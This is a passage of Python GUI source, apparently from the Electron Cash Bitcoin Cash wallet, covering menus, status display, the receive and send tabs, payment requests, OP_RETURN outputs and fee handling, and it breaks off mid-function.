add_toggle_action(view_menu, self.converter_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools"))
# Settings / Preferences are all reserved keywords in OSX using this as work around
tools_menu.addAction(_("Electron Cash preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self))
tools_menu.addAction(_("Optional &Features"), self.internal_plugins_dialog)
tools_menu.addAction(_("Installed &Plugins"), self.external_plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Official website"), lambda: webbrowser.open("http://electroncash.org"))
help_menu.addSeparator()
help_menu.addAction(_("Documentation"), lambda: webbrowser.open("http://electroncash.readthedocs.io/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters()[0]
self.pay_to_URI('{}:{}?message=donation for {}'
.format(NetworkConstants.CASHADDR_PREFIX, d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electron Cash",
_("Version")+" %s" % (self.wallet.electrum_version) + "\n\n" +
_("Electron Cash's focus is speed, with low resource usage and simplifying Bitcoin Cash. You do not need to perform regular backups, because your wallet can be recovered from a secret phrase that you can memorize or write on paper. Startup times are instant because it operates in conjunction with high-performance servers that handle the most complicated parts of the Bitcoin Cash system." + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
"<a href=\"https://github.com/Electron-Cash/Electron-Cash/issues\">https://github.com/Electron-Cash/Electron-Cash/issues</a><br/><br/>",
_("Before reporting a bug, upgrade to the most recent version of Electron Cash (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electron Cash - " + _("Reporting Bugs"))
@rate_limited(15.0)
def notify_transactions(self):
if self.network and self.network.is_connected() and self.wallet and not self.cleaned_up:
n_ok = 0
num_txns = len(self.tx_notifications)
if num_txns:
# Combine the transactions
total_amount = 0
for tx in self.tx_notifications:
if tx:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if v > 0 and is_relevant:
total_amount += v
n_ok += 1
if n_ok:
self.print_error("Notifying GUI %d tx"%(n_ok))
if n_ok > 1:
self.notify(_("{} new transactions received: Total amount received in the new transactions {}")
.format(n_ok, self.format_amount_and_units(total_amount)))
else:
self.notify(_("New transaction received: {}").format(self.format_amount_and_units(total_amount)))
self.tx_notifications = list()
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electron Cash", message, QIcon(":icons/electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electron Cash", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join( directory, filename )
fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def timer_actions(self):
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, self.num_zeros, self.decimal_point, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount):
text = self.format_amount(amount) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount)
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
return format_fee_satoshis(fee_rate/1000, self.num_zeros) + ' sat/byte'
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
assert self.decimal_point in [2, 5, 8]
if self.decimal_point == 2:
return 'cash'
if self.decimal_point == 5:
return 'mBCH'
if self.decimal_point == 8:
return 'BCH'
raise Exception('Unknown base unit')
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
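            # The 'follows' flag breaks the feedback loop: when one edit is updated
            # programmatically from the other, its own change handler returns early.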
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else None
if rate is None or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None or not self.network.is_running():
text = _("Offline")
icon = QIcon(":icons/status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
num_chains = len(self.network.get_blockchains())
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
text = _("Synchronizing...")
icon = QIcon(":icons/status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = QIcon(":icons/status_lagging.png") if num_chains <= 1 else QIcon(":icons/status_lagging_fork.png")
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, True).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = QIcon(":icons/status_connected.png") if num_chains <= 1 else QIcon(":icons/status_connected_fork.png")
else:
icon = QIcon(":icons/status_connected_proxy.png") if num_chains <= 1 else QIcon(":icons/status_connected_proxy_fork.png")
else:
text = _("Not connected")
icon = QIcon(":icons/status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self):
self.history_list.update()
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_completions()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
def create_history_tab(self):
from .history_list import HistoryList
self.history_list = l = HistoryList(self)
l.searchable_list = l
return l
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_transaction(self, tx, tx_desc = None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, self, tx_desc)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_address = None
self.receive_address_e = ButtonsLineEdit()
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
msg = _('Bitcoin Cash address where the payment should be received. Note that each payment request uses a different Bitcoin Cash address.')
self.receive_address_label = HelpLabel(_('Receiving address'), msg)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.receive_address_e.setFocusPolicy(Qt.NoFocus)
self.cashaddr_toggled_signal.connect(self.update_receive_address_widget)
grid.addWidget(self.receive_address_label, 0, 0)
grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 1, 0)
grid.addWidget(self.receive_message_e, 1, 1, 1, -1)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 2, 0)
grid.addWidget(self.receive_amount_e, 2, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 2, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.expires_combo = QComboBox()
self.expires_combo.addItems([i[0] for i in expiration_values])
self.expires_combo.setCurrentIndex(3)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Bitcoin Cash addresses.'),
_('The Bitcoin Cash address never expires and will always be part of this Electron Cash wallet.'),
])
grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0)
grid.addWidget(self.expires_combo, 3, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 3, 1)
self.save_request_button = QPushButton(_('Save'))
self.save_request_button.clicked.connect(self.save_payment_request)
self.new_request_button = QPushButton(_('New'))
self.new_request_button.clicked.connect(self.new_payment_request)
self.receive_qr = QRCodeWidget(fixedSize=200)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.save_request_button)
buttons.addWidget(self.new_request_button)
grid.addLayout(buttons, 4, 1, 1, 2)
self.receive_requests_label = QLabel(_('Requests'))
from .request_list import RequestList
self.request_list = RequestList(self)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addWidget(self.receive_qr)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_payment_request(self, addr):
self.wallet.remove_payment_request(addr, self.config)
self.request_list.update()
self.clear_receive_tab()
def get_request_URI(self, addr):
req = self.wallet.receive_requests[addr]
message = self.wallet.labels.get(addr.to_storage_string(), '')
amount = req['amount']
URI = web.create_URI(addr, amount, message)
if req.get('time'):
URI += "&time=%d"%req.get('time')
if req.get('exp'):
URI += "&exp=%d"%req.get('exp')
if req.get('name') and req.get('sig'):
sig = bfh(req.get('sig'))
sig = bitcoin.base_encode(sig, base=58)
URI += "&name=" + req['name'] + "&sig="+sig
return str(URI)
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = self.password_dialog(msg)
if password:
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(str(e))
return
else:
return
else:
return
def save_payment_request(self):
if not self.receive_address:
self.show_error(_('No receiving address'))
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
if not message and not amount:
self.show_error(_('No message or amount'))
return False
i = self.expires_combo.currentIndex()
expiration = list(map(lambda x: x[1], expiration_values))[i]
req = self.wallet.make_payment_request(self.receive_address, amount,
message, expiration)
self.wallet.add_payment_request(req, self.config)
self.sign_payment_request(self.receive_address)
self.request_list.update()
self.address_list.update()
self.save_request_button.setEnabled(False)
def view_and_paste(self, title, msg, data):
dialog = WindowModalDialog(self, title)
vbox = QVBoxLayout()
label = QLabel(msg)
label.setWordWrap(True)
vbox.addWidget(label)
pr_e = ShowQRTextEdit(text=data)
vbox.addWidget(pr_e)
vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def export_payment_request(self, addr):
r = self.wallet.receive_requests[addr]
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(util.to_bytes(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def new_payment_request(self):
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
return
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
self.set_receive_address(addr)
self.expires_label.hide()
self.expires_combo.show()
self.new_request_button.setEnabled(False)
self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
self.receive_address = addr
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.update_receive_address_widget()
def update_receive_address_widget(self):
text = ''
if self.receive_address:
text = self.receive_address.to_full_ui_string()
self.receive_address_e.setText(text)
def clear_receive_tab(self):
self.expires_label.hide()
self.expires_combo.show()
self.set_receive_address(self.wallet.get_receiving_address())
def toggle_qr_window(self):
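        # Create the detached QR window lazily and remember its geometry across
        # hide/show cycles so it reappears where the user last placed it.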
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
self.receive_address = addr
self.show_receive_tab()
self.new_request_button.setEnabled(True)
self.update_receive_address_widget()
def update_receive_qr(self):
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
self.save_request_button.setEnabled((amount is not None) or (message != ""))
uri = web.create_URI(self.receive_address, amount, message)
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.set_content(self.receive_address_e.text(), amount,
message, uri)
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Bitcoin Cash address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin Cash address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.setCompleter(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
grid.addWidget(self.message_e, 2, 1, 1, -1)
msg_opreturn = ( _('OP_RETURN data (optional).') + '\n\n'
+ _('Posts a PERMANENT note to the BCH blockchain as part of this transaction.')
+ '\n\n' + _('If you specify OP_RETURN text, you may leave the \'Pay to\' field blank.') )
self.opreturn_label = HelpLabel(_('OP_RETURN'), msg_opreturn)
grid.addWidget(self.opreturn_label, 3, 0)
self.message_opreturn_e = MyLineEdit()
grid.addWidget(self.message_opreturn_e, 3, 1, 1, -1)
if not self.config.get('enable_opreturn'):
self.message_opreturn_e.setText("")
self.message_opreturn_e.setHidden(True)
self.opreturn_label.setHidden(True)
self.from_label = QLabel(_('From'))
grid.addWidget(self.from_label, 4, 0)
self.from_list = MyTreeWidget(self, self.from_list_menu, ['',''])
self.from_list.setHeaderHidden(True)
self.from_list.setMaximumHeight(80)
grid.addWidget(self.from_list, 4, 1, 1, -1)
self.set_pay_from([])
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 5, 0)
grid.addWidget(self.amount_e, 5, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 5, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(140)
grid.addWidget(self.max_button, 5, 3)
hbox = QHBoxLayout()
hbox.addStretch(1)
grid.addLayout(hbox, 5, 4)
msg = _('Bitcoin Cash transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('Fee'), msg)
def fee_cb(dyn, pos, fee_rate):
if dyn:
self.config.set_key('fee_level', pos, False)
else:
self.config.set_key('fee_per_kb', fee_rate, False)
self.spend_max() if self.is_max else self.update_fee()
self.fee_slider = FeeSlider(self, self.config, fee_cb)
self.fee_slider.setFixedWidth(140)
self.fee_custom_lbl = HelpLabel(self.get_custom_fee_text(),
_('This is the fee rate that will be used for this transaction.')
+ "\n\n" + _('It is calculated from the Custom Fee Rate in preferences, but can be overridden from the manual fee edit on this form (if enabled).')
+ "\n\n" + _('Generally, a fee of 1.0 sats/B is a good minimal rate to ensure your transaction will make it into the next block.'))
self.fee_custom_lbl.setFixedWidth(140)
self.fee_slider_mogrifier()
self.fee_e = BTCAmountEdit(self.get_decimal_point)
if not self.config.get('show_fee', False):
self.fee_e.setVisible(False)
self.fee_e.textEdited.connect(self.update_fee)
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
self.fee_e.editingFinished.connect(self.update_fee)
self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
grid.addWidget(self.fee_e_label, 6, 0)
grid.addWidget(self.fee_slider, 6, 1)
grid.addWidget(self.fee_custom_lbl, 6, 1)
grid.addWidget(self.fee_e, 6, 2)
self.preview_button = EnterButton(_("Preview"), self.do_preview)
self.preview_button.setToolTip(_('Display the details of your transactions before signing it.'))
self.send_button = EnterButton(_("Send"), self.do_send)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 7, 1, 1, 3)
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
self.message_opreturn_e.textEdited.connect(self.update_fee)
self.message_opreturn_e.textChanged.connect(self.update_fee)
self.message_opreturn_e.editingFinished.connect(self.update_fee)
def reset_max(t):
self.is_max = False
self.max_button.setEnabled(not bool(t))
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
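# Visual feedback for the send form: colour the amount/fee fields and show a
# status-bar warning for "not enough funds" or an over-long OP_RETURN payload.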
def entry_changed():
text = ""
if self.not_enough_funds:
amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
text = _( "Not enough funds" )
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += ' (' + self.format_amount(c+u+x).strip() + ' ' + self.base_unit() + ' ' +_("are frozen") + ')'
elif self.fee_e.isModified():
amt_color, fee_color = ColorScheme.DEFAULT, ColorScheme.DEFAULT
elif self.amount_e.isModified():
amt_color, fee_color = ColorScheme.DEFAULT, ColorScheme.BLUE
else:
amt_color, fee_color = ColorScheme.BLUE, ColorScheme.BLUE
opret_color = ColorScheme.DEFAULT
if self.op_return_toolong:
opret_color = ColorScheme.RED
text = _("OP_RETURN message too large, needs to be under 220 bytes") + (", " if text else "") + text
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color.as_stylesheet())
self.fee_e.setStyleSheet(fee_color.as_stylesheet())
self.message_opreturn_e.setStyleSheet(opret_color.as_stylesheet())
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.message_opreturn_e.textChanged.connect(entry_changed)
self.message_opreturn_e.textEdited.connect(entry_changed)
self.message_opreturn_e.editingFinished.connect(entry_changed)
self.invoices_label = QLabel(_('Invoices'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
self.is_max = True
self.do_update_fee()
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
r = self.payto_e.get_recipient()
if r:
return r
return (TYPE_ADDRESS, self.wallet.dummy_address())
def get_custom_fee_text(self, fee_rate = None):
if not self.config.has_custom_fee_rate():
return ""
else:
if fee_rate is None: fee_rate = self.config.custom_fee_rate() / 1000.0
return str(round(fee_rate*100)/100) + " sats/B"
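# Build a zero-value TYPE_SCRIPT output carrying the given text as OP_RETURN data:
# the string is UTF-8 encoded, hex encoded and appended to "OP_RETURN ".
# Payloads over 220 bytes raise OPReturnTooLarge.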
@staticmethod
def output_for_opreturn_stringdata(op_return):
if not isinstance(op_return, str):
raise OPReturnError('OP_RETURN parameter needs to be of type str!')
op_return_code = "OP_RETURN "
op_return_encoded = op_return.encode('utf-8')
if len(op_return_encoded) > 220:
raise OPReturnTooLarge(_("OP_RETURN message too large, needs to be under 220 bytes"))
op_return_payload = op_return_encoded.hex()
script = op_return_code + op_return_payload
amount = 0
return (TYPE_SCRIPT, ScriptOutput.from_string(script), amount)
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
freeze_fee = (self.fee_e.isModified()
and (self.fee_e.text() or self.fee_e.hasFocus()))
amount = '!' if self.is_max else self.amount_e.get_amount()
fee_rate = None
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.not_enough_funds = False
self.statusBar().showMessage('')
else:
fee = self.fee_e.get_amount() if freeze_fee else None
outputs = self.payto_e.get_outputs(self.is_max)
if not outputs:
_type, addr = self.get_payto_or_dummy()
outputs = [(_type, addr, amount)]
try:
opreturn_message = self.message_opreturn_e.text() if self.config.get('enable_opreturn') else None
if opreturn_message:
outputs.append(self.output_for_opreturn_stringdata(opreturn_message))
tx = self.wallet.make_unsigned_transaction(self.get_coins(), outputs, self.config, fee)
self.not_enough_funds = False
self.op_return_toolong = False
except NotEnoughFunds:
self.not_enough_funds = True
if not freeze_fee:
self.fee_e.setAmount(None)
return
except OPReturnTooLarge:
self.op_return_toolong = True
return
except OPReturnError as e:
self.statusBar().showMessage(str(e))
return
except BaseException:
return
if not freeze_fee:
fee = None if self.not_enough_funds else tx.get_fee()
self.fee_e.setAmount(fee)
if self.is_max:
amount = tx.output_value()
self.amount_e.setAmount(amount)
if fee is not None:
fee_rate = fee / tx.estimated_size()
self.fee_slider_mogrifier(self.get_custom_fee_text(fee_rate))
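# Show either the fee slider or the custom-fee-rate label, depending on whether a
# custom fee rate is configured; optionally refresh the label text.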
def fee_slider_mogrifier(self, text = None):
fee_slider_hidden = self.config.has_custom_fee_rate()
self.fee_slider.setHidden(fee_slider_hidden)
self.fee_custom_lbl.setHidden(not fee_slider_hidden)
if text is not None: self.fee_custom_lbl.setText(text)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
self.pay_from = list(coins)
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format(x):
h = x['prevout_hash']
return '{}...{}:{:d}\t{}'.format(h[0:10], h[-10:],
x['prevout_n'], x['address'])
for item in self.pay_from:
self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ]))
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_password():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
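# Validate the Send tab and collect (outputs, fee, label, coins) for transaction
# construction; returns None (implicitly) on validation errors such as an expired
# payment request, invalid 'Pay to' lines, an unvalidated alias, or a missing amount.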
def read_send_tab(self):
isInvoice = False
if self.payment_request and self.payment_request.has_expired():
self.show_error(_('Payment request has expired'))
return
label = self.message_e.text()
if self.payment_request:
isInvoice = True
outputs = self.payment_request.get_outputs()
else:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
return
outputs = self.payto_e.get_outputs(self.is_max)
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return
try:
# handle op_return if specified and enabled
opreturn_message = self.message_opreturn_e.text()
if opreturn_message:
outputs.append(self.output_for_opreturn_stringdata(opreturn_message))
except OPReturnTooLarge as e:
self.show_error(str(e))
return
except OPReturnError as e:
self.show_error(str(e))
return
if not outputs:
self.show_error(_('No outputs'))
return
for _type, addr, amount in outputs:
if amount is None:
self.show_error(_('Invalid Amount'))
return
freeze_fee = self.fee_e.isVisible() and self.fee_e.isModified() and (self.fee_e.text() or self.fee_e.hasFocus())
fee = self.fee_e.get_amount() if freeze_fee else None
coins = self.get_coins(isInvoice)
return outputs, fee, label, coins
def do_preview(self):
self.do_send(preview = True)
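# Build the unsigned transaction from the Send tab, then either open the preview
# dialog or show a confirmation summary (amount, fee, warnings), ask for the wallet
# password if needed, and finally sign and broadcast via sign_done().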
def do_send(self, preview = False):
if run_hook('abort_send', self):
return
r = self.read_send_tab()
if not r:
return
outputs, fee, tx_desc, coins = r
try:
tx = self.wallet.make_unsigned_transaction(coins, outputs, self.config, fee)
except NotEnoughFunds:
self.show_message(_("Insufficient funds"))
return
except ExcessiveFee:
